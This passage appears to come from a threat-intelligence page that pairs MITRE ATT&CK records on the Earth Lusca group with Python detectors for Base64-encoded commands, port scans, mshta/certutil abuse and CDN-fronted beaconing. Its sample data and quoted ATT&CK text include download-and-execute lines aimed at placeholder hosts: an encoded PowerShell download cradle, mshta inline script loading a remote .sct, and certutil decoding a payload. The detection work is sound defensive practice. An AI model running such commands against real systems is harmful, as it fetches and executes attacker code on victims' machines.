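    except UnicodeDecodeError:
        return None
    return ("utf-8", text) if _is_text(text) else None


def scan_command_lines(lines):
    """Return one finding per decodable Base64 run found in the given command lines."""
    findings = []
    for lineno, line in enumerate(lines, 1):
        for m in _B64_RUN.finditer(line):
            decoded = try_decode(m.group(1))
            if decoded:
                encoding, text = decoded
                findings.append({"line": lineno, "encoded": m.group(1),
                                 "encoding": encoding, "decoded": text})
    return findings


def _b64(text, encoding):
    return base64.b64encode(text.encode(encoding)).decode("ascii")


# Constructed sample process command lines (not real telemetry).
SAMPLE_COMMAND_LINES = [
    r"C:\Windows\System32\cmd.exe /c echo hello",
    "powershell.exe -NoP -W Hidden -EncodedCommand "
    + _b64('IEX (New-Object Net.WebClient).DownloadString("http://c2.example.invalid/a")', "utf-16-le"),
    r"certutil -decode C:\ProgramData\payload.txt C:\ProgramData\payload.cab",
    "cmd.exe /c echo " + _b64("http://c2.example.invalid/stage2.cab", "utf-8") + r" > C:\ProgramData\payload.txt",
    "verify 3b2c7e9d1a0f4b8c6d5e2f1a9b8c7d6e5f4a3b2c1d0e9f8a7b6c5d4e3f2a1b0c",  # hex digest: valid alphabet, not text
]

if __name__ == "__main__":
    for f in scan_command_lines(SAMPLE_COMMAND_LINES):
        print(f"line {f['line']} [{f['encoding']}] {f['decoded']}")
```

Run over the sample, only the PowerShell blob and the echoed URL are reported; the hex digest on the last line has a valid Base64 alphabet but does not decode to text and is dropped. The same `try_decode` applies to the string that the certutil relationship below describes being decoded into a cabinet file.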
Targets included government institutions, news media outlets, gambling companies, educational institutions, COVID-19 research organizations, telecommunications companies, religious movements banned in China, and cryptocurrency trading platforms; security researchers assess some [Earth Lusca](https://attack.mitre.org/groups/G1006) operations may be financially motivated.(Citation: TrendMicro EarthLusca 2022) [Earth Lusca](https://attack.mitre.org/groups/G1006) has used malware commonly used by other Chinese threat groups, including [APT41](https://attack.mitre.org/groups/G0096) and the [Winnti Group](https://attack.mitre.org/groups/G0044) cluster; however, security researchers assess [Earth Lusca](https://attack.mitre.org/groups/G1006)'s techniques and infrastructure are separate.(Citation: TrendMicro EarthLusca 2022) aliases : ['Earth Lusca', 'TAG-22'] external_references : [{'source_name': 'mitre-attack', 'url': 'https://attack.mitre.org/groups/G1006', 'external_id': 'G1006'}, {'source_name': 'TAG-22', 'description': '(Citation: Recorded Future TAG-22 July 2021)'}, {'source_name': 'TrendMicro EarthLusca 2022', 'description': 'Chen, J., et al. (2022). Delving Deep: An Analysis of Earth Lusca’s Operations. Retrieved July 1, 2022.', 'url': 'https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf'}, {'source_name': 'Recorded Future TAG-22 July 2021', 'description': 'INSIKT GROUP. (2021, July 8). Chinese State-Sponsored Activity Group TAG-22 Targets Nepal, the Philippines, and Taiwan Using Winnti and Other Tooling. Retrieved September 2, 2022.', 'url': 'https://www.recordedfuture.com/chinese-group-tag-22-targets-nepal-philippines-taiwan'}] object_marking_refs : ['marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168'] x_mitre_attack_spec_version : 2.1.0 x_mitre_deprecated : False x_mitre_domains : ['enterprise-attack', 'mobile-attack'] x_mitre_modified_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 x_mitre_version : 1.0 technique_ref : attack-pattern--5502c4e9-24ef-4d5f-8ee9-9e906c2f82c4 relationship_description : [Earth Lusca](https://attack.mitre.org/groups/G1006) has scanned for vulnerabilities in the public-facing servers of their targets.(Citation: TrendMicro EarthLusca 2022) relationship_id : relationship--e0e8cd30-04d6-457c-b4c1-34145f182dad revoked : False technique : Vulnerability Scanning technique_description : Adversaries may scan victims for vulnerabilities that can be used during targeting. Vulnerability scans typically check if the configuration of a target host/application (ex: software and version) potentially aligns with the target of a specific exploit the adversary may seek to use. These scans may also include more broad attempts to [Gather Victim Host Information](https://attack.mitre.org/techniques/T1592) that can be used to identify more commonly known, exploitable vulnerabilities. 
Vulnerability scans typically harvest running software and version numbers via server banners, listening ports, or other network artifacts.(Citation: OWASP Vuln Scanning) Information from these scans may reveal opportunities for other forms of reconnaissance (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593) or [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)), establishing operational resources (ex: [Develop Capabilities](https://attack.mitre.org/techniques/T1587) or [Obtain Capabilities](https://attack.mitre.org/techniques/T1588)), and/or initial access (ex: [Exploit Public-Facing Application](https://attack.mitre.org/techniques/T1190)). tactic : [KillChainPhase(kill_chain_name='mitre-attack', phase_name='reconnaissance')] technique_id : T1595.002 matrix : mitre-attack platform : ['PRE'] data_sources : ['Network Traffic: Network Traffic Content', 'Network Traffic: Network Traffic Flow'] ---------------------------------------------------------------------------------------------------- type : intrusion-set id : intrusion-set--cc613a49-9bfa-4e22-98d1-15ffbb03f034 created_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 created : 2022-07-01T20:12:30.184Z modified : 2022-10-17T19:51:56.531Z name : Earth Lusca description : [Earth Lusca](https://attack.mitre.org/groups/G1006) is a suspected China-based cyber espionage group that has been active since at least April 2019. [Earth Lusca](https://attack.mitre.org/groups/G1006) has targeted organizations in Australia, China, Hong Kong, Mongolia, Nepal, the Philippines, Taiwan, Thailand, Vietnam, the United Arab Emirates, Nigeria, Germany, France, and the United States. 
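The Vulnerability Scanning (T1595.002) record above lists only Network Traffic Flow and Content as data sources, which is where the banner-harvesting pattern shows up: one source touching many ports on a public-facing host in a short span. The following sliding-window detector is an added example written for this page, not code from MITRE or Trend Micro; the flow records are constructed, and the 60-second window and the threshold of 12 distinct ports or hosts are assumed tuning values, not published figures.

```python
from collections import Counter, defaultdict, deque, namedtuple

# One connection attempt as a flow collector or perimeter firewall would log it (constructed shape).
Flow = namedtuple("Flow", "ts src dst dport")


def detect_scanners(flows, window_s=60, threshold=12):
    """Map each scanning source address to a reason string.

    A source is flagged when, within any window_s-second span, its connections touch
    threshold or more distinct ports on one host (vertical scan: the banner-harvesting
    pattern) or one port on threshold or more distinct hosts (horizontal scan: one
    exploit candidate tried across an address range).
    """
    by_src = defaultdict(list)
    for f in flows:
        by_src[f.src].append(f)

    alerts = {}
    for src, events in by_src.items():
        events.sort(key=lambda f: f.ts)
        window = deque()
        ports_by_host = defaultdict(Counter)   # dst  -> {dport: hits inside the window}
        hosts_by_port = defaultdict(Counter)   # dport -> {dst: hits inside the window}
        for f in events:
            window.append(f)
            ports_by_host[f.dst][f.dport] += 1
            hosts_by_port[f.dport][f.dst] += 1
            # Slide the window: forget flows older than window_s seconds.
            while f.ts - window[0].ts > window_s:
                old = window.popleft()
                for table, key, sub in ((ports_by_host, old.dst, old.dport),
                                        (hosts_by_port, old.dport, old.dst)):
                    table[key][sub] -= 1
                    if table[key][sub] == 0:
                        del table[key][sub]
            if len(ports_by_host[f.dst]) >= threshold:
                alerts[src] = f"vertical scan: {len(ports_by_host[f.dst])} ports on {f.dst} within {window_s}s"
                break
            if len(hosts_by_port[f.dport]) >= threshold:
                alerts[src] = f"horizontal scan: {len(hosts_by_port[f.dport])} hosts on port {f.dport} within {window_s}s"
                break
    return alerts


_PORTS = [21, 22, 25, 53, 80, 110, 143, 443, 445, 993, 1433, 3306, 3389, 8080]

# Constructed flows: a fast vertical scan, a fast horizontal scan, a slow scan that stays
# under the window, and a normal client repeatedly using one service.
SAMPLE_FLOWS = (
    [Flow(1000 + 2 * i, "203.0.113.7", "198.51.100.10", p) for i, p in enumerate(_PORTS)]
    + [Flow(2000 + i, "203.0.113.9", f"198.51.100.{20 + i}", 445) for i in range(20)]
    + [Flow(3000 + 120 * i, "203.0.113.11", "198.51.100.10", p) for i, p in enumerate(_PORTS)]
    + [Flow(4000 + 5 * i, "192.0.2.5", "198.51.100.10", 443) for i in range(30)]
)

if __name__ == "__main__":
    for src, reason in detect_scanners(SAMPLE_FLOWS).items():
        print(src, reason)
```

The slow scanner (one port every two minutes) is deliberately missed at a 60-second window and only appears once the window is widened; low-and-slow scans need a longer horizon or per-source cumulative counts, at the cost of more false positives from monitoring systems and CDN health checks.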
Targets included government institutions, news media outlets, gambling companies, educational institutions, COVID-19 research organizations, telecommunications companies, religious movements banned in China, and cryptocurrency trading platforms; security researchers assess some [Earth Lusca](https://attack.mitre.org/groups/G1006) operations may be financially motivated.(Citation: TrendMicro EarthLusca 2022) [Earth Lusca](https://attack.mitre.org/groups/G1006) has used malware commonly used by other Chinese threat groups, including [APT41](https://attack.mitre.org/groups/G0096) and the [Winnti Group](https://attack.mitre.org/groups/G0044) cluster; however, security researchers assess [Earth Lusca](https://attack.mitre.org/groups/G1006)'s techniques and infrastructure are separate.(Citation: TrendMicro EarthLusca 2022) aliases : ['Earth Lusca', 'TAG-22'] external_references : [{'source_name': 'mitre-attack', 'url': 'https://attack.mitre.org/groups/G1006', 'external_id': 'G1006'}, {'source_name': 'TAG-22', 'description': '(Citation: Recorded Future TAG-22 July 2021)'}, {'source_name': 'TrendMicro EarthLusca 2022', 'description': 'Chen, J., et al. (2022). Delving Deep: An Analysis of Earth Lusca’s Operations. Retrieved July 1, 2022.', 'url': 'https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf'}, {'source_name': 'Recorded Future TAG-22 July 2021', 'description': 'INSIKT GROUP. (2021, July 8). Chinese State-Sponsored Activity Group TAG-22 Targets Nepal, the Philippines, and Taiwan Using Winnti and Other Tooling. Retrieved September 2, 2022.', 'url': 'https://www.recordedfuture.com/chinese-group-tag-22-targets-nepal-philippines-taiwan'}] object_marking_refs : ['marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168'] x_mitre_attack_spec_version : 2.1.0 x_mitre_deprecated : False x_mitre_domains : ['enterprise-attack', 'mobile-attack'] x_mitre_modified_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 x_mitre_version : 1.0 technique_ref : attack-pattern--840a987a-99bd-4a80-a5c9-0cb2baa6cade relationship_description : [Earth Lusca](https://attack.mitre.org/groups/G1006) has used `mshta.exe` to load an HTA script within a malicious .LNK file.(Citation: TrendMicro EarthLusca 2022) relationship_id : relationship--a3627d9d-1c78-4b10-8b1c-3183a939862b revoked : False technique : Mshta technique_description : Adversaries may abuse mshta.exe to proxy execution of malicious .hta files and JavaScript or VBScript through a trusted Windows utility. There are several examples of different types of threats leveraging mshta.exe during initial compromise and for execution of code (Citation: Cylance Dust Storm) (Citation: Red Canary HTA Abuse Part Deux) (Citation: FireEye Attacks Leveraging HTA) (Citation: Airbus Security Kovter Analysis) (Citation: FireEye FIN7 April 2017) Mshta.exe is a utility that executes Microsoft HTML Applications (HTA) files. (Citation: Wikipedia HTML Application) HTAs are standalone applications that execute using the same models and technologies of Internet Explorer, but outside of the browser. (Citation: MSDN HTML Applications) Files may be executed by mshta.exe through an inline script: `mshta vbscript:Close(Execute("GetObject(""script:https[:]//webserver/payload[.]sct"")"))` They may also be executed directly from URLs: `mshta http[:]//webserver/payload[.]hta` Mshta.exe can be used to bypass application control solutions that do not account for its potential use. Since mshta.exe executes outside of Internet Explorer's security context, it also bypasses browser security settings. (Citation: LOLBAS Mshta) tactic : [KillChainPhase(kill_chain_name='mitre-attack', phase_name='defense-evasion')] technique_id : T1218.005 matrix : mitre-attack platform : ['Windows'] data_sources : ['Process: Process Creation', 'File: File Creation', 'Command: Command Execution', 'Network Traffic: Network Connection Creation'] permissions_required : ['User'] ---------------------------------------------------------------------------------------------------- type : intrusion-set id : intrusion-set--cc613a49-9bfa-4e22-98d1-15ffbb03f034 created_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 created : 2022-07-01T20:12:30.184Z modified : 2022-10-17T19:51:56.531Z name : Earth Lusca description : [Earth Lusca](https://attack.mitre.org/groups/G1006) is a suspected China-based cyber espionage group that has been active since at least April 2019. [Earth Lusca](https://attack.mitre.org/groups/G1006) has targeted organizations in Australia, China, Hong Kong, Mongolia, Nepal, the Philippines, Taiwan, Thailand, Vietnam, the United Arab Emirates, Nigeria, Germany, France, and the United States. 
Targets included government institutions, news media outlets, gambling companies, educational institutions, COVID-19 research organizations, telecommunications companies, religious movements banned in China, and cryptocurrency trading platforms; security researchers assess some [Earth Lusca](https://attack.mitre.org/groups/G1006) operations may be financially motivated.(Citation: TrendMicro EarthLusca 2022) [Earth Lusca](https://attack.mitre.org/groups/G1006) has used malware commonly used by other Chinese threat groups, including [APT41](https://attack.mitre.org/groups/G0096) and the [Winnti Group](https://attack.mitre.org/groups/G0044) cluster; however, security researchers assess [Earth Lusca](https://attack.mitre.org/groups/G1006)'s techniques and infrastructure are separate.(Citation: TrendMicro EarthLusca 2022) aliases : ['Earth Lusca', 'TAG-22'] external_references : [{'source_name': 'mitre-attack', 'url': 'https://attack.mitre.org/groups/G1006', 'external_id': 'G1006'}, {'source_name': 'TAG-22', 'description': '(Citation: Recorded Future TAG-22 July 2021)'}, {'source_name': 'TrendMicro EarthLusca 2022', 'description': 'Chen, J., et al. (2022). Delving Deep: An Analysis of Earth Lusca’s Operations. Retrieved July 1, 2022.', 'url': 'https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf'}, {'source_name': 'Recorded Future TAG-22 July 2021', 'description': 'INSIKT GROUP. (2021, July 8). Chinese State-Sponsored Activity Group TAG-22 Targets Nepal, the Philippines, and Taiwan Using Winnti and Other Tooling. Retrieved September 2, 2022.', 'url': 'https://www.recordedfuture.com/chinese-group-tag-22-targets-nepal-philippines-taiwan'}] object_marking_refs : ['marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168'] x_mitre_attack_spec_version : 2.1.0 x_mitre_deprecated : False x_mitre_domains : ['enterprise-attack', 'mobile-attack'] x_mitre_modified_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 x_mitre_version : 1.0 technique_ref : attack-pattern--3ccef7ae-cb5e-48f6-8302-897105fbf55c relationship_description : [Earth Lusca](https://attack.mitre.org/groups/G1006) has used [certutil](https://attack.mitre.org/software/S0160) to decode a string into a cabinet file.(Citation: TrendMicro EarthLusca 2022) relationship_id : relationship--52a5b303-b759-424e-86b8-5c855976e5ea revoked : False technique : Deobfuscate/Decode Files or Information technique_description : Adversaries may use [Obfuscated Files or Information](https://attack.mitre.org/techniques/T1027) to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods include built-in functionality of the malware or utilities already present on the system. One such example is the use of [certutil](https://attack.mitre.org/software/S0160) to decode a remote access tool portable executable file that has been hidden inside a certificate file.(Citation: Malwarebytes Targeted Attack against Saudi Arabia) Another example is using the Windows copy /b command to reassemble binary fragments into a malicious payload.(Citation: Carbon Black Obfuscation Sept 2016) Sometimes a user's action may be required to open it for deobfuscation or decryption as part of [User Execution](https://attack.mitre.org/techniques/T1204). The user may also be required to input a password to open a password-protected compressed/encrypted file that was provided by the adversary. 
(Citation: Volexity PowerDuke November 2016) tactic : [KillChainPhase(kill_chain_name='mitre-attack', phase_name='defense-evasion')] technique_id : T1140 matrix : mitre-attack platform : ['Windows', 'Linux', 'macOS'] data_sources : ['Process: Process Creation', 'Script: Script Execution', 'File: File Modification'] ---------------------------------------------------------------------------------------------------- type : intrusion-set id : intrusion-set--cc613a49-9bfa-4e22-98d1-15ffbb03f034 created_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 created : 2022-07-01T20:12:30.184Z modified : 2022-10-17T19:51:56.531Z name : Earth Lusca description : [Earth Lusca](https://attack.mitre.org/groups/G1006) is a suspected China-based cyber espionage group that has been active since at least April 2019. [Earth Lusca](https://attack.mitre.org/groups/G1006) has targeted organizations in Australia, China, Hong Kong, Mongolia, Nepal, the Philippines, Taiwan, Thailand, Vietnam, the United Arab Emirates, Nigeria, Germany, France, and the United States. 
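The Mshta (T1218.005) and Deobfuscate/Decode Files or Information (T1140) records above both come down to the same telemetry: a Process Creation event for a signed Windows binary with a command line it should not normally have. The triage below covers both in one pass, because they share the event parsing: `mshta.exe` launched with an inline `vbscript:`/`javascript:` protocol handler, a URL or a local `.hta` (the LNK-delivered HTA case shows up as `mshta.exe` with `explorer.exe` as parent), and `certutil.exe` run with `-decode`/`-urlcache` rather than certificate-store verbs. It is an added example written for this page, not code from MITRE, Trend Micro or LOLBAS; the events are constructed with Sysmon Event ID 1 field names, and the parent-process list, severities and extension list are the author's assumptions.

```python
import re

# Command-line patterns that matter for mshta.exe and certutil.exe abuse (assumed rule set).
_INLINE_PROTOCOL = re.compile(r"\b(vbscript|javascript|about):", re.I)   # mshta vbscript:..., javascript:...
_REMOTE_URL = re.compile(r"\bhttps?://", re.I)
_HTA_FILE = re.compile(r"\S+\.hta\b", re.I)
_CERTUTIL_ABUSE = re.compile(r"(?:^|\s)-{1,2}(decodehex|decode|encode|urlcache)\b", re.I)
_PAYLOAD_EXT = re.compile(r"\.(cab|exe|dll|ps1|hta|bat|vbs)\b", re.I)
_USER_FACING_PARENTS = {"explorer.exe", "winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}


def _basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def triage_event(event):
    """Return [(rule, severity), ...] for one process-creation event (Sysmon EID 1 field names)."""
    image = _basename(event.get("Image", ""))
    cmd = event.get("CommandLine", "")
    parent = _basename(event.get("ParentImage", ""))
    findings = []
    if image == "mshta.exe":
        if _INLINE_PROTOCOL.search(cmd):
            findings.append(("mshta inline script via protocol handler", "high"))
        if _REMOTE_URL.search(cmd):
            findings.append(("mshta loading remote content", "high"))
        elif _HTA_FILE.search(cmd):
            findings.append(("mshta executing a local .hta file", "medium"))
        if parent in _USER_FACING_PARENTS:
            findings.append((f"mshta spawned by {parent} (user opened a .lnk, document or attachment)", "medium"))
    elif image == "certutil.exe":
        m = _CERTUTIL_ABUSE.search(cmd)
        if m:
            # Decoding straight into an executable container is the T1140 pattern in the record above.
            severity = "high" if _PAYLOAD_EXT.search(cmd) else "medium"
            findings.append((f"certutil -{m.group(1).lower()} outside certificate management", severity))
    return findings


def triage_events(events):
    """Return [(event index, rule, severity), ...] across a batch of events."""
    return [(i, rule, sev) for i, ev in enumerate(events) for rule, sev in triage_event(ev)]


# Constructed events modelled on the two relationships above (not real telemetry).
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\mshta.exe", "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r'"C:\Windows\System32\mshta.exe" "C:\Users\alice\AppData\Local\Temp\invoice.hta"'},
    {"Image": r"C:\Windows\System32\mshta.exe", "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r'mshta vbscript:Close(Execute("GetObject(""script:https://cdn.example.invalid/x.sct"")"))'},
    {"Image": r"C:\Windows\System32\certutil.exe", "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"certutil -decode C:\ProgramData\k.txt C:\ProgramData\k.cab"},
    {"Image": r"C:\Windows\System32\certutil.exe", "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"certutil -verify -urlfetch C:\Temp\server.cer"},        # legitimate admin use
    {"Image": r"C:\Windows\System32\certutil.exe", "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"certutil -addstore Root C:\Temp\corp-ca.cer"},            # legitimate admin use
]

if __name__ == "__main__":
    for i, rule, sev in triage_events(SAMPLE_EVENTS):
        print(f"event {i}: [{sev}] {rule}")
```

Matching on the image basename is a convenience for the example; in production also check the original file name and signer, since renaming `mshta.exe` or `certutil.exe` is the obvious evasion, and correlate the certutil decode with the File Creation event for the `.cab` it writes.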
Targets included government institutions, news media outlets, gambling companies, educational institutions, COVID-19 research organizations, telecommunications companies, religious movements banned in China, and cryptocurrency trading platforms; security researchers assess some [Earth Lusca](https://attack.mitre.org/groups/G1006) operations may be financially motivated.(Citation: TrendMicro EarthLusca 2022) [Earth Lusca](https://attack.mitre.org/groups/G1006) has used malware commonly used by other Chinese threat groups, including [APT41](https://attack.mitre.org/groups/G0096) and the [Winnti Group](https://attack.mitre.org/groups/G0044) cluster; however, security researchers assess [Earth Lusca](https://attack.mitre.org/groups/G1006)'s techniques and infrastructure are separate.(Citation: TrendMicro EarthLusca 2022) aliases : ['Earth Lusca', 'TAG-22'] external_references : [{'source_name': 'mitre-attack', 'url': 'https://attack.mitre.org/groups/G1006', 'external_id': 'G1006'}, {'source_name': 'TAG-22', 'description': '(Citation: Recorded Future TAG-22 July 2021)'}, {'source_name': 'TrendMicro EarthLusca 2022', 'description': 'Chen, J., et al. (2022). Delving Deep: An Analysis of Earth Lusca’s Operations. Retrieved July 1, 2022.', 'url': 'https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf'}, {'source_name': 'Recorded Future TAG-22 July 2021', 'description': 'INSIKT GROUP. (2021, July 8). Chinese State-Sponsored Activity Group TAG-22 Targets Nepal, the Philippines, and Taiwan Using Winnti and Other Tooling. Retrieved September 2, 2022.', 'url': 'https://www.recordedfuture.com/chinese-group-tag-22-targets-nepal-philippines-taiwan'}] object_marking_refs : ['marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168'] x_mitre_attack_spec_version : 2.1.0 x_mitre_deprecated : False x_mitre_domains : ['enterprise-attack', 'mobile-attack'] x_mitre_modified_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 x_mitre_version : 1.0 technique_ref : attack-pattern--d742a578-d70e-4d0e-96a6-02a9c30204e6 relationship_description : [Earth Lusca](https://attack.mitre.org/groups/G1006) has performed watering hole attacks.(Citation: TrendMicro EarthLusca 2022) relationship_id : relationship--29a1fc8a-58c3-4465-b170-d9ec7c2d4d22 revoked : False technique : Drive-by Compromise technique_description : Adversaries may gain access to a system through a user visiting a website over the normal course of browsing. With this technique, the user's web browser is typically targeted for exploitation, but adversaries may also use compromised websites for non-exploitation behavior such as acquiring [Application Access Token](https://attack.mitre.org/techniques/T1550/001). Multiple ways of delivering exploit code to a browser exist (i.e., [Drive-by Target](https://attack.mitre.org/techniques/T1608/004)), including: * A legitimate website is compromised where adversaries have injected some form of malicious code such as JavaScript, iFrames, and cross-site scripting * Script files served to a legitimate website from a publicly writeable cloud storage bucket are modified by an adversary * Malicious ads are paid for and served through legitimate ad providers (i.e., [Malvertising](https://attack.mitre.org/techniques/T1583/008)) * Built-in web application interfaces are leveraged for the insertion of any other kind of object that can be used to display web content or contain a script that executes on the visiting client (e.g. forum posts, comments, and other user controllable web content). Often the website used by an adversary is one visited by a specific community, such as government, a particular industry, or region, where the goal is to compromise a specific user or set of users based on a shared interest. This kind of targeted campaign is often referred to as a strategic web compromise or watering hole attack. There are several known examples of this occurring.(Citation: Shadowserver Strategic Web Compromise) Typical drive-by compromise process: 1. A user visits a website that is used to host the adversary controlled content. 2. Scripts automatically execute, typically searching versions of the browser and plugins for a potentially vulnerable version. * The user may be required to assist in this process by enabling scripting or active website components and ignoring warning dialog boxes. 3. Upon finding a vulnerable version, exploit code is delivered to the browser. 4. If exploitation is successful, then it will give the adversary code execution on the user's system unless other protections are in place. * In some cases a second visit to the website after the initial scan is required before exploit code is delivered. Unlike [Exploit Public-Facing Application](https://attack.mitre.org/techniques/T1190), the focus of this technique is to exploit software on a client endpoint upon visiting a website. This will commonly give an adversary access to systems on the internal network instead of external systems that may be in a DMZ. Adversaries may also use compromised websites to deliver a user to a malicious application designed to [Steal Application Access Token](https://attack.mitre.org/techniques/T1528)s, like OAuth tokens, to gain access to protected applications and information. 
These malicious applications have been delivered through popups on legitimate websites.(Citation: Volexity OceanLotus Nov 2017) tactic : [KillChainPhase(kill_chain_name='mitre-attack', phase_name='initial-access')] technique_id : T1189 matrix : mitre-attack platform : ['Windows', 'Linux', 'macOS', 'SaaS'] data_sources : ['Application Log: Application Log Content', 'Network Traffic: Network Traffic Content', 'Process: Process Creation', 'File: File Creation', 'Network Traffic: Network Connection Creation'] ---------------------------------------------------------------------------------------------------- type : intrusion-set id : intrusion-set--cc613a49-9bfa-4e22-98d1-15ffbb03f034 created_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 created : 2022-07-01T20:12:30.184Z modified : 2022-10-17T19:51:56.531Z name : Earth Lusca description : [Earth Lusca](https://attack.mitre.org/groups/G1006) is a suspected China-based cyber espionage group that has been active since at least April 2019. [Earth Lusca](https://attack.mitre.org/groups/G1006) has targeted organizations in Australia, China, Hong Kong, Mongolia, Nepal, the Philippines, Taiwan, Thailand, Vietnam, the United Arab Emirates, Nigeria, Germany, France, and the United States. 
Targets included government institutions, news media outlets, gambling companies, educational institutions, COVID-19 research organizations, telecommunications companies, religious movements banned in China, and cryptocurrency trading platforms; security researchers assess some [Earth Lusca](https://attack.mitre.org/groups/G1006) operations may be financially motivated.(Citation: TrendMicro EarthLusca 2022) [Earth Lusca](https://attack.mitre.org/groups/G1006) has used malware commonly used by other Chinese threat groups, including [APT41](https://attack.mitre.org/groups/G0096) and the [Winnti Group](https://attack.mitre.org/groups/G0044) cluster; however, security researchers assess [Earth Lusca](https://attack.mitre.org/groups/G1006)'s techniques and infrastructure are separate.(Citation: TrendMicro EarthLusca 2022) aliases : ['Earth Lusca', 'TAG-22'] external_references : [{'source_name': 'mitre-attack', 'url': 'https://attack.mitre.org/groups/G1006', 'external_id': 'G1006'}, {'source_name': 'TAG-22', 'description': '(Citation: Recorded Future TAG-22 July 2021)'}, {'source_name': 'TrendMicro EarthLusca 2022', 'description': 'Chen, J., et al. (2022). Delving Deep: An Analysis of Earth Lusca’s Operations. Retrieved July 1, 2022.', 'url': 'https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf'}, {'source_name': 'Recorded Future TAG-22 July 2021', 'description': 'INSIKT GROUP. (2021, July 8). Chinese State-Sponsored Activity Group TAG-22 Targets Nepal, the Philippines, and Taiwan Using Winnti and Other Tooling. Retrieved September 2, 2022.', 'url': 'https://www.recordedfuture.com/chinese-group-tag-22-targets-nepal-philippines-taiwan'}] object_marking_refs : ['marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168'] x_mitre_attack_spec_version : 2.1.0 x_mitre_deprecated : False x_mitre_domains : ['enterprise-attack', 'mobile-attack'] x_mitre_modified_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 x_mitre_version : 1.0 technique_ref : attack-pattern--731f4f55-b6d0-41d1-a7a9-072a66389aea relationship_description : [Earth Lusca](https://attack.mitre.org/groups/G1006) adopted Cloudflare as a proxy for compromised servers.(Citation: TrendMicro EarthLusca 2022) relationship_id : relationship--bee75401-9e24-4c5d-9203-0b3cdca01cbf revoked : False technique : Proxy technique_description : Adversaries may use a connection proxy to direct network traffic between systems or act as an intermediary for network communications to a command and control server to avoid direct connections to their infrastructure. Many tools exist that enable traffic redirection through proxies or port redirection, including [HTRAN](https://attack.mitre.org/software/S0040), ZXProxy, and ZXPortMap. (Citation: Trend Micro APT Attack Tools) Adversaries use these types of proxies to manage command and control communications, reduce the number of simultaneous outbound network connections, provide resiliency in the face of connection loss, or to ride over existing trusted communications paths between victims to avoid suspicion. Adversaries may chain together multiple proxies to further disguise the source of malicious traffic. Adversaries can also take advantage of routing schemes in Content Delivery Networks (CDNs) to proxy command and control traffic. 
tactic : [KillChainPhase(kill_chain_name='mitre-attack', phase_name='command-and-control')] technique_id : T1090 matrix : mitre-attack platform : ['Linux', 'macOS', 'Windows', 'Network'] data_sources : ['Network Traffic: Network Traffic Flow', 'Network Traffic: Network Traffic Content', 'Network Traffic: Network Connection Creation'] ---------------------------------------------------------------------------------------------------- type : intrusion-set id : intrusion-set--cc613a49-9bfa-4e22-98d1-15ffbb03f034 created_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 created : 2022-07-01T20:12:30.184Z modified : 2022-10-17T19:51:56.531Z name : Earth Lusca description : [Earth Lusca](https://attack.mitre.org/groups/G1006) is a suspected China-based cyber espionage group that has been active since at least April 2019. [Earth Lusca](https://attack.mitre.org/groups/G1006) has targeted organizations in Australia, China, Hong Kong, Mongolia, Nepal, the Philippines, Taiwan, Thailand, Vietnam, the United Arab Emirates, Nigeria, Germany, France, and the United States. 
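The Proxy (T1090) record above says Earth Lusca put Cloudflare in front of compromised servers. The practical consequence for detection is that the destination IP of the C2 channel is a shared CDN edge and carries no signal on its own; what remains is the TLS SNI (or HTTP Host) plus the timing of the connections. The detector below keys CDN-fronted traffic on SNI and flags pairs whose inter-arrival gaps are too regular to be a person browsing. It is an added example written for this page, not code from MITRE or Trend Micro. The prefixes are a handful of the IPv4 ranges Cloudflare publishes at https://www.cloudflare.com/ips/, embedded here as a fixed table for an offline run (fetch the current list in production); the connection log, the SNI allowlist, and the thresholds (8 connections, coefficient of variation at most 0.15) are constructed assumptions.

```python
import ipaddress
import statistics
from collections import defaultdict

# A few of the IPv4 prefixes Cloudflare publishes, used as a constructed lookup table.
CDN_PREFIXES = [ipaddress.ip_network(p) for p in (
    "104.16.0.0/13", "104.24.0.0/14", "172.64.0.0/13", "162.158.0.0/15",
    "198.41.128.0/17", "141.101.64.0/18", "108.162.192.0/18", "173.245.48.0/20",
)]
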